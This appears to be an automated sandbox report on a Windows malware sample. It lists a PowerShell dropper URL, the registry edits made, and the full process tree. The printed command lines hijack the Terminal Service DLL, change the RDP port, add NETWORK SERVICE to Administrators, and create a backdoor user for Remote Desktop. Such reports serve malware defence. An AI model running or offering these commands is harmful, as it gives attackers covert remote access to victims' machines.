5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b

Analysis

max time kernel
131s
max time network
121s
platform
windows7_x64
resource
win7v20201028
submitted
08-11-2020 17:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
Size

3.5MB
MD5

7e806fd5ef516e10a4e4a5362fbc600b
SHA1

edb1b43d7578f170f259958663ace80a01718dc8
SHA256

5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b
SHA512

30544680de5f5af999cbbba6d632acb4319c370bf526b23cde5e8f40172b97d885608e5a9b086d1cd2df6ee97cc5bb51bb9bf74a742d5866dcca2c58b6c2dbd8

Score

10^/10

discovery exploit persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blacklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
6	1524	powershell.exe
8	1524	powershell.exe
10	1524	powershell.exe
11	1524	powershell.exe
13	1524	powershell.exe
15	1524	powershell.exe
17	1524	powershell.exe
19	1524	powershell.exe
21	1524	powershell.exe
23	1524	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1592 icacls.exe
1168 takeown.exe
928 icacls.exe
820 icacls.exe
1892 icacls.exe
1780 icacls.exe
388 icacls.exe
1596 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
1592	icacls.exe
1168	takeown.exe
928	icacls.exe
820	icacls.exe
1892	icacls.exe
1780	icacls.exe
388	icacls.exe
1596	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1520 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

pid process

776
776
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid process

820 icacls.exe
1892 icacls.exe
1780 icacls.exe
388 icacls.exe
1596 icacls.exe
1592 icacls.exe
1168 takeown.exe
928 icacls.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
1520	powershell.exe

pid	process
776
776

pid	process
820	icacls.exe
1892	icacls.exe
1780	icacls.exe
388	icacls.exe
1596	icacls.exe
1592	icacls.exe
1168	takeown.exe
928	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 41 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b2fcaef4-fe23-4bce-824b-6f6358e02795	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1392e70e-8760-49f9-8db6-9210f73c194f	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE7E2.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE812.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE99A.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE9FE.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OC4OCEVQ0O8MTHG64QLV.temp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6ca124d-2b16-44b3-b580-ffcbc351d963	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE762.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE7E1.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE99B.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE9AC.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f47bda0-737c-4ae9-85f7-27ae6ff58d6b	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f637b8f2-be9c-4cd3-9bb2-8473715f4eed	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE9AB.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE9FD.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarEA20.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_97d0585d-0c74-4d3a-b7b3-e44078483ccf	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d9e07f56-99aa-4761-adbb-7ee46037c24c	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4936f899-a790-4ea7-91ea-f8cbd194919f	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3add778d-4d46-412c-aff1-6168a6ec4152	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabE9DC.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE9DD.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabEA1F.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b790b175-d71f-400d-a665-dc041bfbf95a	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ba969b79-46fa-4f1b-9437-043abed65c8d	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE763.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarE813.tmp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe

Modifies data under HKEY_USERS 60 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70a9bef30bb6d601	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1752 reg.exe
Runs net.exe

pid	process
1752	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	10	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

1520 powershell.exe
1520 powershell.exe
1520 powershell.exe
1520 powershell.exe
1520 powershell.exe
1524 powershell.exe
1524 powershell.exe
Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

464
776
776
776
776

pid	process
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1524	powershell.exe
1524	powershell.exe

pid	process
464
776
776
776
776

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeRestorePrivilege	820	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	304	WMIC.exe
Token: SeIncreaseQuotaPrivilege	304	WMIC.exe
Token: SeAuditPrivilege	304	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	304	WMIC.exe
Token: SeIncreaseQuotaPrivilege	304	WMIC.exe
Token: SeAuditPrivilege	304	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1780	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1780	WMIC.exe
Token: SeAuditPrivilege	1780	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1780	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1780	WMIC.exe
Token: SeAuditPrivilege	1780	WMIC.exe
Token: SeDebugPrivilege	1524	powershell.exe

Suspicious use of WriteProcessMemory 133 IoCs

Processes:

5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exepowershell.execsc.exenet.execmd.execmd.exenet.exe

description	pid	process	target process
PID 1640 wrote to memory of 1520	1640	5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe	powershell.exe
PID 1640 wrote to memory of 1520	1640	5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe	powershell.exe
PID 1640 wrote to memory of 1520	1640	5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe	powershell.exe
PID 1640 wrote to memory of 1520	1640	5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe	powershell.exe
PID 1520 wrote to memory of 1688	1520	powershell.exe	csc.exe
PID 1520 wrote to memory of 1688	1520	powershell.exe	csc.exe
PID 1520 wrote to memory of 1688	1520	powershell.exe	csc.exe
PID 1688 wrote to memory of 1084	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 1084	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 1084	1688	csc.exe	cvtres.exe
PID 1520 wrote to memory of 1168	1520	powershell.exe	takeown.exe
PID 1520 wrote to memory of 1168	1520	powershell.exe	takeown.exe
PID 1520 wrote to memory of 1168	1520	powershell.exe	takeown.exe
PID 1520 wrote to memory of 928	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 928	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 928	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 820	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 820	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 820	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1892	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1892	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1892	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1780	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1780	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1780	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 388	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 388	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 388	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1596	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1596	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1596	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1592	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1592	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1592	1520	powershell.exe	icacls.exe
PID 1520 wrote to memory of 1684	1520	powershell.exe	reg.exe
PID 1520 wrote to memory of 1684	1520	powershell.exe	reg.exe
PID 1520 wrote to memory of 1684	1520	powershell.exe	reg.exe
PID 1520 wrote to memory of 1752	1520	powershell.exe	reg.exe
PID 1520 wrote to memory of 1752	1520	powershell.exe	reg.exe
PID 1520 wrote to memory of 1752	1520	powershell.exe	reg.exe
PID 1520 wrote to memory of 1268	1520	powershell.exe	reg.exe
PID 1520 wrote to memory of 1268	1520	powershell.exe	reg.exe
PID 1520 wrote to memory of 1268	1520	powershell.exe	reg.exe
PID 1520 wrote to memory of 1612	1520	powershell.exe	net.exe
PID 1520 wrote to memory of 1612	1520	powershell.exe	net.exe
PID 1520 wrote to memory of 1612	1520	powershell.exe	net.exe
PID 1612 wrote to memory of 2008	1612	net.exe	net1.exe
PID 1612 wrote to memory of 2008	1612	net.exe	net1.exe
PID 1612 wrote to memory of 2008	1612	net.exe	net1.exe
PID 1520 wrote to memory of 1648	1520	powershell.exe	cmd.exe
PID 1520 wrote to memory of 1648	1520	powershell.exe	cmd.exe
PID 1520 wrote to memory of 1648	1520	powershell.exe	cmd.exe
PID 1648 wrote to memory of 1100	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1100	1648	cmd.exe	cmd.exe
PID 1648 wrote to memory of 1100	1648	cmd.exe	cmd.exe
PID 1100 wrote to memory of 1084	1100	cmd.exe	net.exe
PID 1100 wrote to memory of 1084	1100	cmd.exe	net.exe
PID 1100 wrote to memory of 1084	1100	cmd.exe	net.exe
PID 1084 wrote to memory of 1092	1084	net.exe	net1.exe
PID 1084 wrote to memory of 1092	1084	net.exe	net1.exe
PID 1084 wrote to memory of 1092	1084	net.exe	net1.exe
PID 1520 wrote to memory of 332	1520	powershell.exe	cmd.exe
PID 1520 wrote to memory of 332	1520	powershell.exe	cmd.exe
PID 1520 wrote to memory of 332	1520	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe
"C:\Users\Admin\AppData\Local\Temp\5cab7684d39cf15db3b9314c14a16e5df6eeaebe69b953c18b87e0c65330e00b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1640

\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6420.tmp" "c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\CSCECA57343D3A14B89AA49B14023A79037.TMP"
4⤵
PID:1084

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1168

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:928

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:820

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1892

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1780

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:388

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1596

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1592

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:1684

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:1752

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:1268

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2008

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1092

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:332

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
PID:556

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:472

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:1584

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:948

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
PID:956

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
PID:1324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:816

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc wlgHGI30 /add
1⤵
PID:1168

C:\Windows\system32\net.exe
net.exe user wgautilacc wlgHGI30 /add
2⤵
PID:656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc wlgHGI30 /add
3⤵
PID:344

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
PID:1104

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
PID:1692

C:\Windows\system32\net1.exe
